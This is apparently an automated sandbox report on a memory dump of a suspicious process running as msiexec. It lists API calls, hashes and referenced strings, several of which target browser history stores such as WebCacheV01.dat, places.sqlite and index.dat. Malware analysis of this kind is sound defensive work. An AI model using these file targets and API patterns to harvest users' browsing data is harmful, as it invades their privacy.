                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                              • String ID: GetProcessTimes$kernel32.dll
                                                              • API String ID: 1714573020-3385500049
                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                              APIs
                                                              • memset.MSVCRT ref: 004087D6
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                              • memset.MSVCRT ref: 00408828
                                                              • memset.MSVCRT ref: 00408840
                                                              • memset.MSVCRT ref: 00408858
                                                              • memset.MSVCRT ref: 00408870
                                                              • memset.MSVCRT ref: 00408888
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2911713577-0
                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                              APIs
                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 1475443563-3708268960
                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 1579243037-1578091866
                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E60F
                                                              • memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                              • API String ID: 3354267031-2114579845
                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                              Strings
                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                              • API String ID: 2221118986-1725073988
                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                              APIs
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$memcmp
                                                              • String ID: $$8
                                                              • API String ID: 2808797137-435121686
                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                              APIs
                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                              • String ID:
                                                              • API String ID: 1979745280-0
                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                              APIs
                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                              • free.MSVCRT ref: 00418803
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                              • String ID:
                                                              • API String ID: 1355100292-0
                                                              • Opcode ID: 5668d0b7c5c9ca58d6e5ee57346aa2e448fecd31d747e20cfbee9aabcf780e2b
                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                              • Opcode Fuzzy Hash: 5668d0b7c5c9ca58d6e5ee57346aa2e448fecd31d747e20cfbee9aabcf780e2b
                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                              APIs
                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              • memset.MSVCRT ref: 00414C87
                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProcVersionmemsetwcscpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 4182280571-2036018995
                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                              APIs
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                              • memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                              • String ID: history.dat$places.sqlite
                                                              • API String ID: 2641622041-467022611
                                                              • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                              • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                              APIs
                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                              • GetLastError.KERNEL32 ref: 00417627
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$File$PointerRead
                                                              • String ID:
                                                              • API String ID: 839530781-0
                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID: *.*$index.dat
                                                              • API String ID: 1974802433-2863569691
                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                              • String ID:
                                                              • API String ID: 1125800050-0
                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                              APIs
                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                              • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleSleep
                                                              • String ID: }A
                                                              • API String ID: 252777609-2138825249
                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                              APIs
                                                              • malloc.MSVCRT ref: 00409A10
                                                              • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                              • free.MSVCRT ref: 00409A31
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: freemallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3056473165-0
                                                              • Opcode ID: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                              • Opcode Fuzzy Hash: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                              • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: BINARY
                                                              • API String ID: 2221118986-907554435
                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /stext
                                                              • API String ID: 2081463915-3817206916
                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: .#v
                                                              • API String ID: 2081463915-507759092
                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
